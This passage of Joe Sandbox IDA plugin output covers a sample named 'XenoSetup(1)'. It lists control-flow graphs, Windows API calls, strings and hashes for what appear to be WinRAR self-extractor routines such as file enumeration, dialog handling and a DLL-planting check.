                                                                                      control_flow_graph 1025 fea69b-fea6bf call ffec50 1028 fea727-fea730 FindNextFileW 1025->1028 1029 fea6c1-fea6ce FindFirstFileW 1025->1029 1030 fea742-fea7ff call ff0602 call fec310 call ff15da * 3 1028->1030 1032 fea732-fea740 GetLastError 1028->1032 1029->1030 1031 fea6d0-fea6e2 call febb03 1029->1031 1038 fea804-fea811 1030->1038 1040 fea6fe-fea707 GetLastError 1031->1040 1041 fea6e4-fea6fc FindFirstFileW 1031->1041 1034 fea719-fea722 1032->1034 1034->1038 1043 fea709-fea70c 1040->1043 1044 fea717 1040->1044 1041->1030 1041->1040 1043->1044 1046 fea70e-fea711 1043->1046 1044->1034 1046->1044 1048 fea713-fea715 1046->1048 1048->1034
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00FEA592,000000FF,?,?), ref: 00FEA6C4
                                                                                        • Part of subcall function 00FEBB03: _wcslen.LIBCMT ref: 00FEBB27
                                                                                      • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00FEA592,000000FF,?,?), ref: 00FEA6F2
                                                                                      • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00FEA592,000000FF,?,?), ref: 00FEA6FE
                                                                                      • FindNextFileW.KERNEL32(?,?,?,?,?,?,00FEA592,000000FF,?,?), ref: 00FEA728
                                                                                      • GetLastError.KERNEL32(?,?,?,?,00FEA592,000000FF,?,?), ref: 00FEA734
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                      • String ID:
                                                                                      • API String ID: 42610566-0
                                                                                      • Opcode ID: 6a0b2da790fc66981a979748e5a300ac73b28173dc520b6b855af3d2e076cc02
                                                                                      • Instruction ID: 43949223591ac76d8f310b20d166d08bc5d566c0f445180cb9d6123940620714
                                                                                      • Opcode Fuzzy Hash: 6a0b2da790fc66981a979748e5a300ac73b28173dc520b6b855af3d2e076cc02
                                                                                      • Instruction Fuzzy Hash: EF418F72900559ABCB25DF64CC88AEAB7B8FF48360F144196F56DE3240D7386E90DF90
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(00000000,?,01007DC4,00000000,0101C300,0000000C,01007F1B,00000000,00000002,00000000), ref: 01007E0F
                                                                                      • TerminateProcess.KERNEL32(00000000,?,01007DC4,00000000,0101C300,0000000C,01007F1B,00000000,00000002,00000000), ref: 01007E16
                                                                                      • ExitProcess.KERNEL32 ref: 01007E28
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                      • String ID:
                                                                                      • API String ID: 1703294689-0
                                                                                      • Opcode ID: 4a1c1d5ed9411785f6cc463d1691593725c3057105ed66b78f1d4ba14ffe43b4
                                                                                      • Instruction ID: 76e267e93ff8422968a99cf4f2d2373d81e05d4d94694416d0b8532fe4fb58fa
                                                                                      • Opcode Fuzzy Hash: 4a1c1d5ed9411785f6cc463d1691593725c3057105ed66b78f1d4ba14ffe43b4
                                                                                      • Instruction Fuzzy Hash: 20E04F31041184EBDF136F14C908A893FA9FB14351F004454F8C98A166CB3EED51CB90
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID:
                                                                                      • API String ID: 3519838083-0
                                                                                      • Opcode ID: e3d19820547afde36ee2eadf9efee114573c4328057b97f1bb9c440b3ce99157
                                                                                      • Instruction ID: abe86bd3a81d00f17bfadad51da6c6c88938aee9fc86b374404e4031f37d4898
                                                                                      • Opcode Fuzzy Hash: e3d19820547afde36ee2eadf9efee114573c4328057b97f1bb9c440b3ce99157
                                                                                      • Instruction Fuzzy Hash: 71823B71D042C5AEDF25EF65C881BFABB79BF05350F0840B9E84D9B152CB345A86E760
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00FFB7E5
                                                                                        • Part of subcall function 00FE1316: GetDlgItem.USER32(00000000,00003021), ref: 00FE135A
                                                                                        • Part of subcall function 00FE1316: SetWindowTextW.USER32(00000000,010135F4), ref: 00FE1370
                                                                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00FFB8D1
                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FFB8EF
                                                                                      • IsDialogMessageW.USER32(?,?), ref: 00FFB902
                                                                                      • TranslateMessage.USER32(?), ref: 00FFB910
                                                                                      • DispatchMessageW.USER32(?), ref: 00FFB91A
                                                                                      • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00FFB93D
                                                                                      • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00FFB960
                                                                                      • GetDlgItem.USER32(?,00000068), ref: 00FFB983
                                                                                      • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00FFB99E
                                                                                      • SendMessageW.USER32(00000000,000000C2,00000000,010135F4), ref: 00FFB9B1
                                                                                        • Part of subcall function 00FFD453: _wcslen.LIBCMT ref: 00FFD47D
                                                                                      • SetFocus.USER32(00000000), ref: 00FFB9B8
                                                                                      • _swprintf.LIBCMT ref: 00FFBA24
                                                                                        • Part of subcall function 00FE4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FE40A5
                                                                                        • Part of subcall function 00FFD4D4: GetDlgItem.USER32(00000068,0103FCB8), ref: 00FFD4E8
                                                                                        • Part of subcall function 00FFD4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00FFAF07,00000001,?,?,00FFB7B9,0101506C,0103FCB8,0103FCB8,00001000,00000000,00000000), ref: 00FFD510
                                                                                        • Part of subcall function 00FFD4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00FFD51B
                                                                                        • Part of subcall function 00FFD4D4: SendMessageW.USER32(00000000,000000C2,00000000,010135F4), ref: 00FFD529
                                                                                        • Part of subcall function 00FFD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00FFD53F
                                                                                        • Part of subcall function 00FFD4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00FFD559
                                                                                        • Part of subcall function 00FFD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00FFD59D
                                                                                        • Part of subcall function 00FFD4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00FFD5AB
                                                                                        • Part of subcall function 00FFD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00FFD5BA
                                                                                        • Part of subcall function 00FFD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00FFD5E1
                                                                                        • Part of subcall function 00FFD4D4: SendMessageW.USER32(00000000,000000C2,00000000,010143F4), ref: 00FFD5F0
                                                                                      • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00FFBA68
                                                                                      • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00FFBA90
                                                                                      • GetTickCount.KERNEL32 ref: 00FFBAAE
                                                                                      • _swprintf.LIBCMT ref: 00FFBAC2
                                                                                      • GetLastError.KERNEL32(?,00000011), ref: 00FFBAF4
                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00FFBB43
                                                                                      • _swprintf.LIBCMT ref: 00FFBB7C
                                                                                      • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00FFBBD0
                                                                                      • GetCommandLineW.KERNEL32 ref: 00FFBBEA
                                                                                      • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00FFBC47
                                                                                      • ShellExecuteExW.SHELL32(0000003C), ref: 00FFBC6F
                                                                                      • Sleep.KERNEL32(00000064), ref: 00FFBCB9
                                                                                      • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00FFBCE2
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00FFBCEB
                                                                                      • _swprintf.LIBCMT ref: 00FFBD1E
                                                                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00FFBD7D
                                                                                      • SetDlgItemTextW.USER32(?,00000065,010135F4), ref: 00FFBD94
                                                                                      • GetDlgItem.USER32(?,00000065), ref: 00FFBD9D
                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00FFBDAC
                                                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00FFBDBB
                                                                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00FFBE68
                                                                                      • _wcslen.LIBCMT ref: 00FFBEBE
                                                                                      • _swprintf.LIBCMT ref: 00FFBEE8
                                                                                      • SendMessageW.USER32(?,00000080,00000001,?), ref: 00FFBF32
                                                                                      • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00FFBF4C
                                                                                      • GetDlgItem.USER32(?,00000068), ref: 00FFBF55
                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00FFBF6B
                                                                                      • GetDlgItem.USER32(?,00000066), ref: 00FFBF85
                                                                                      • SetWindowTextW.USER32(00000000,0102A472), ref: 00FFBFA7
                                                                                      • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00FFC007
                                                                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00FFC01A
                                                                                      • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00FFC0BD
                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00FFC197
                                                                                      • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00FFC1D9
                                                                                        • Part of subcall function 00FFC73F: __EH_prolog.LIBCMT ref: 00FFC744
                                                                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00FFC1FD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
                                                                                      • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                                      • API String ID: 3445078344-1670982708
                                                                                      • Opcode ID: b2748fb82817b101b6a6cc10649c1b86f8d961bf44fdb36ce097e5783a4c1304
                                                                                      • Instruction ID: bc3ff2c86715f01ae5b010b6e10130349bd2278d3869e796e30da4d80fdaf89d
                                                                                      • Opcode Fuzzy Hash: b2748fb82817b101b6a6cc10649c1b86f8d961bf44fdb36ce097e5783a4c1304
                                                                                      • Instruction Fuzzy Hash: 3C421471D4425CBBEB319B60DD8AFBE376CAF01710F104059F784AA0A6CB7E5944EB61

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 268 ff0863-ff0886 call ffec50 GetModuleHandleW 271 ff0888-ff089f GetProcAddress 268->271 272 ff08e7-ff0b48 268->272 275 ff08b9-ff08c9 GetProcAddress 271->275 276 ff08a1-ff08b7 271->276 273 ff0b4e-ff0b59 call 10075fb 272->273 274 ff0c14-ff0c40 GetModuleFileNameW call fec29a call ff0602 272->274 273->274 285 ff0b5f-ff0b8d GetModuleFileNameW CreateFileW 273->285 291 ff0c42-ff0c4e call feb146 274->291 279 ff08cb-ff08e0 275->279 280 ff08e5 275->280 276->275 279->280 280->272 288 ff0b8f-ff0b9b SetFilePointer 285->288 289 ff0c08-ff0c0f CloseHandle 285->289 288->289 292 ff0b9d-ff0bb9 ReadFile 288->292 289->274 297 ff0c7d-ff0ca4 call fec310 GetFileAttributesW 291->297 298 ff0c50-ff0c5b call ff081b 291->298 292->289 294 ff0bbb-ff0be0 292->294 296 ff0bfd-ff0c06 call ff0371 294->296 296->289 304 ff0be2-ff0bfc call ff081b 296->304 306 ff0cae 297->306 307 ff0ca6-ff0caa 297->307 298->297 309 ff0c5d-ff0c7b CompareStringW 298->309 304->296 311 ff0cb0-ff0cb5 306->311 307->291 310 ff0cac 307->310 309->297 309->307 310->311 313 ff0cec-ff0cee 311->313 314 ff0cb7 311->314 316 ff0dfb-ff0e05 313->316 317 ff0cf4-ff0d0b call fec2e4 call feb146 313->317 315 ff0cb9-ff0ce0 call fec310 GetFileAttributesW 314->315 323 ff0cea 315->323 324 ff0ce2-ff0ce6 315->324 327 ff0d0d-ff0d6e call ff081b * 2 call fee617 call fe4092 call fee617 call ffa7e4 317->327 328 ff0d73-ff0da6 call fe4092 AllocConsole 317->328 323->313 324->315 326 ff0ce8 324->326 326->313 334 ff0df3-ff0df5 ExitProcess 327->334 333 ff0da8-ff0ded GetCurrentProcessId AttachConsole call 1003e13 GetStdHandle WriteConsoleW Sleep FreeConsole 328->333 328->334 333->334
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(kernel32), ref: 00FF087C
                                                                                      • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00FF088E
                                                                                      • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00FF08BF
                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00FF0B69
                                                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FF0B83
                                                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00FF0B93
                                                                                      • ReadFile.KERNEL32(00000000,?,00007FFE,01013C7C,00000000), ref: 00FF0BB1
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00FF0C09
                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00FF0C1E
                                                                                      • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,01013C7C,?,00000000,?,00000800), ref: 00FF0C72
                                                                                      • GetFileAttributesW.KERNELBASE(?,?,01013C7C,00000800,?,00000000,?,00000800), ref: 00FF0C9C
                                                                                      • GetFileAttributesW.KERNEL32(?,?,01013D44,00000800), ref: 00FF0CD8
                                                                                        • Part of subcall function 00FF081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00FF0836
                                                                                        • Part of subcall function 00FF081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00FEF2D8,Crypt32.dll,00000000,00FEF35C,?,?,00FEF33E,?,?,?), ref: 00FF0858
                                                                                      • _swprintf.LIBCMT ref: 00FF0D4A
                                                                                      • _swprintf.LIBCMT ref: 00FF0D96
                                                                                        • Part of subcall function 00FE4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FE40A5
                                                                                      • AllocConsole.KERNEL32 ref: 00FF0D9E
                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00FF0DA8
                                                                                      • AttachConsole.KERNEL32(00000000), ref: 00FF0DAF
                                                                                      • _wcslen.LIBCMT ref: 00FF0DC4
                                                                                      • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00FF0DD5
                                                                                      • WriteConsoleW.KERNEL32(00000000), ref: 00FF0DDC
                                                                                      • Sleep.KERNEL32(00002710), ref: 00FF0DE7
                                                                                      • FreeConsole.KERNEL32 ref: 00FF0DED
                                                                                      • ExitProcess.KERNEL32 ref: 00FF0DF5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                      • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                                                      • API String ID: 1207345701-3298887752
                                                                                      • Opcode ID: c87681d383ce34046c84d8687ddb7050a360b028b54d5999658c225a130dc374
                                                                                      • Instruction ID: 64c681c19bd3f69b30f92e32a2ac0ece38e86b08aef4617c23ea783e3d124bf0
                                                                                      • Opcode Fuzzy Hash: c87681d383ce34046c84d8687ddb7050a360b028b54d5999658c225a130dc374
                                                                                      • Instruction Fuzzy Hash: E8D190B1408388ABD735DF51D849B9FBAE8BF84724F40491DF2C99A255CB3D8548CBA2

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 347 ffc73f-ffc757 call ffeb78 call ffec50 352 ffd40d-ffd418 347->352 353 ffc75d-ffc787 call ffb314 347->353 353->352 356 ffc78d-ffc792 353->356 357 ffc793-ffc7a1 356->357 358 ffc7a2-ffc7b7 call ffaf98 357->358 361 ffc7b9 358->361 362 ffc7bb-ffc7d0 call ff1fbb 361->362 365 ffc7dd-ffc7e0 362->365 366 ffc7d2-ffc7d6 362->366 367 ffd3d9-ffd404 call ffb314 365->367 368 ffc7e6 365->368 366->362 369 ffc7d8 366->369 367->357 381 ffd40a-ffd40c 367->381 371 ffca5f-ffca61 368->371 372 ffc9be-ffc9c0 368->372 373 ffc7ed-ffc7f0 368->373 374 ffca7c-ffca7e 368->374 369->367 371->367 379 ffca67-ffca77 SetWindowTextW 371->379 372->367 377 ffc9c6-ffc9d2 372->377 373->367 378 ffc7f6-ffc850 call ffa64d call febdf3 call fea544 call fea67e call fe6edb 373->378 374->367 375 ffca84-ffca8b 374->375 375->367 380 ffca91-ffcaaa 375->380 382 ffc9e6-ffc9eb 377->382 383 ffc9d4-ffc9e5 call 1007686 377->383 438 ffc98f-ffc9a4 call fea5d1 378->438 379->367 385 ffcaac 380->385 386 ffcab2-ffcac0 call 1003e13 380->386 381->352 389 ffc9ed-ffc9f3 382->389 390 ffc9f5-ffca00 call ffb48e 382->390 383->382 385->386 386->367 402 ffcac6-ffcacf 386->402 394 ffca05-ffca07 389->394 390->394 399 ffca09-ffca10 call 1003e13 394->399 400 ffca12-ffca32 call 1003e13 call 1003e3e 394->400 399->400 421 ffca4b-ffca4d 400->421 422 ffca34-ffca3b 400->422 406 ffcaf8-ffcafb 402->406 407 ffcad1-ffcad5 402->407 412 ffcb01-ffcb04 406->412 414 ffcbe0-ffcbee call ff0602 406->414 411 ffcad7-ffcadf 407->411 407->412 411->367 417 ffcae5-ffcaf3 call ff0602 411->417 419 ffcb06-ffcb0b 412->419 420 ffcb11-ffcb2c 412->420 430 ffcbf0-ffcc04 call 100279b 414->430 417->430 419->414 419->420 433 ffcb2e-ffcb68 420->433 434 ffcb76-ffcb7d 420->434 421->367 429 ffca53-ffca5a call 1003e2e 421->429 427 ffca3d-ffca3f 422->427 428 ffca42-ffca4a call 1007686 422->428 427->428 428->421 429->367 448 ffcc06-ffcc0a 430->448 449 ffcc11-ffcc62 call ff0602 call ffb1be GetDlgItem SetWindowTextW SendMessageW call 1003e49 430->449 469 ffcb6c-ffcb6e 433->469 470 ffcb6a 433->470 440 ffcb7f-ffcb97 call 1003e13 434->440 441 ffcbab-ffcbce call 1003e13 * 2 434->441 455 ffc9aa-ffc9b9 call fea55a 438->455 456 ffc855-ffc869 SetFileAttributesW 438->456 440->441 460 ffcb99-ffcba6 call ff05da 440->460 441->430 474 ffcbd0-ffcbde call ff05da 441->474 448->449 454 ffcc0c-ffcc0e 448->454 481 ffcc67-ffcc6b 449->481 454->449 455->367 462 ffc90f-ffc91f GetFileAttributesW 456->462 463 ffc86f-ffc8a2 call feb991 call feb690 call 1003e13 456->463 460->441 462->438 468 ffc921-ffc930 DeleteFileW 462->468 490 ffc8b5-ffc8c3 call febdb4 463->490 491 ffc8a4-ffc8b3 call 1003e13 463->491 468->438 475 ffc932-ffc935 468->475 469->434 470->469 474->430 479 ffc939-ffc965 call fe4092 GetFileAttributesW 475->479 488 ffc937-ffc938 479->488 489 ffc967-ffc97d MoveFileW 479->489 481->367 485 ffcc71-ffcc85 SendMessageW 481->485 485->367 488->479 489->438 492 ffc97f-ffc989 MoveFileExW 489->492 490->455 497 ffc8c9-ffc908 call 1003e13 call fffff0 490->497 491->490 491->497 492->438 497->462
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00FFC744
                                                                                        • Part of subcall function 00FFB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00FFB3FB
                                                                                      • _wcslen.LIBCMT ref: 00FFCA0A
                                                                                      • _wcslen.LIBCMT ref: 00FFCA13
                                                                                      • SetWindowTextW.USER32(?,?), ref: 00FFCA71
                                                                                      • _wcslen.LIBCMT ref: 00FFCAB3
                                                                                      • _wcsrchr.LIBVCRUNTIME ref: 00FFCBFB
                                                                                      • GetDlgItem.USER32(?,00000066), ref: 00FFCC36
                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00FFCC46
                                                                                      • SendMessageW.USER32(00000000,00000143,00000000,0102A472), ref: 00FFCC54
                                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00FFCC7F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                                                      • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                      • API String ID: 2804936435-312220925
                                                                                      • Opcode ID: 9ff01e4e01e75560e2f2deb5607b94f07f1a428fa9893ece4c256b97af35995e
                                                                                      • Instruction ID: 21371a3cfb312cd71029d763608b555df8c62ccedff54a5c1aea355c68e0190f
                                                                                      • Opcode Fuzzy Hash: 9ff01e4e01e75560e2f2deb5607b94f07f1a428fa9893ece4c256b97af35995e
                                                                                      • Instruction Fuzzy Hash: B9E162B2D0026DAADB25DBA0DD85EFE77BCAF04310F4041A5F749E7094EB789E449B60
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00FEDA70
                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00FEDAAC
                                                                                        • Part of subcall function 00FEC29A: _wcslen.LIBCMT ref: 00FEC2A2
                                                                                        • Part of subcall function 00FF05DA: _wcslen.LIBCMT ref: 00FF05E0
                                                                                        • Part of subcall function 00FF1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00FEBAE9,00000000,?,?,?,00090028), ref: 00FF1BA0
                                                                                      • _wcslen.LIBCMT ref: 00FEDDE9
                                                                                      • __fprintf_l.LIBCMT ref: 00FEDF1C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                                                      • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                                                      • API String ID: 566448164-801612888
                                                                                      • Opcode ID: 3e412211b8278f9fa2cdfd460f4f0961ed836ccbbcabd4241238b6ff84a42b2b
                                                                                      • Instruction ID: 75f7c187bfdd0b85555f1c47ed2fb1bc563df2bcba7bfc979200f03393469e59
